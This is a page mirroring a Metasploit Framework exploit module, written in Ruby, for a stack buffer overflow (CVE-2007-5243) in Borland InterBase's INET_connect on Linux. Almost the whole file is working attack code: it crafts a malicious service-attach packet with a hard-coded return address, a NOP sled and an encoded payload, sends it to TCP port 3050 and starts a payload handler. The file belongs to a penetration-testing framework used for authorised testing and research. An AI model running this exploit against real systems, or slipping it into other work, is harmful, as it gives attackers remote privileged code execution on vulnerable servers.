Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/misc/ib_inet_connect.rb
19500 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name'	=> 'Borland InterBase INET_connect() Buffer Overflow',

16
        'Description'	=> %q{

17
          This module exploits a stack buffer overflow in Borland InterBase

18
          by sending a specially crafted service attach request.

19
        },

20
        'Author' => [

21
          'Ramon de C Valle',

22
          'Adriano Lima <adriano[at]risesecurity.org>',

23
        ],

24
        'Arch'	=> ARCH_X86,

25
        'Platform'	=> 'linux',

26
        'References' => [

27
          [ 'CVE', '2007-5243' ],

28
          [ 'OSVDB', '38605' ],

29
          [ 'BID', '25917' ],

30
          [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],

31
        ],

32
        'Privileged'	=> true,

33
        'License'	=> MSF_LICENSE,

34
        'Payload' => {

35
          'Space' => 512,

36
          'BadChars' => "\x00\x2f\x3a\x40\x5c",

37
        },

38
        'Targets' => [

39
          # 0x0804d2ee 5b5e5f5dc3

40
          [

41
            'Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253',

42
            { 'Ret' => 0x0804d2ee }

43
          ],

44
        ],

45
        'DefaultTarget'	=> 0,

46
        'DisclosureDate' => '2007-10-03',

47
        'Notes' => {

48
          'Reliability' => UNKNOWN_RELIABILITY,

49
          'Stability' => UNKNOWN_STABILITY,

50
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

51
        }

52
      )

53
    )

54


55
    register_options(

56
      [

57
        Opt::RPORT(3050)

58
      ],

59
      self.class

60
    )

61
  end

62


63
  def exploit

64
    connect

65


66
    # Attach database

67
    op_attach = 19

68


69
    # Create database

70
    op_create = 20

71


72
    # Service attach

73
    op_service_attach = 82

74


75
    length = 161

76
    remainder = length.remainder(4)

77
    padding = 0

78


79
    if remainder > 0

80
      padding = (4 - remainder)

81
    end

82


83
    buf = ''

84


85
    # Operation/packet type

86
    buf << [op_service_attach].pack('N')

87


88
    # Id

89
    buf << [0].pack('N')

90


91
    # Length

92
    buf << [length].pack('N')

93


94
    # Random alpha data

95
    buf << rand_text_alpha(length - 5)

96


97
    # Target

98
    buf << [target.ret].pack('L')

99


100
    # Separator

101
    buf << ':'

102


103
    # Padding

104
    buf << "\x00" * padding

105


106
    # Database parameter block

107


108
    # Length

109
    buf << [1024].pack('N')

110


111
    # It will return into this nop block

112
    buf << make_nops(1024 - payload.encoded.length)

113


114
    # Payload

115
    buf << payload.encoded

116


117
    sock.put(buf)

118


119
    handler

120
  end

121
end

122


123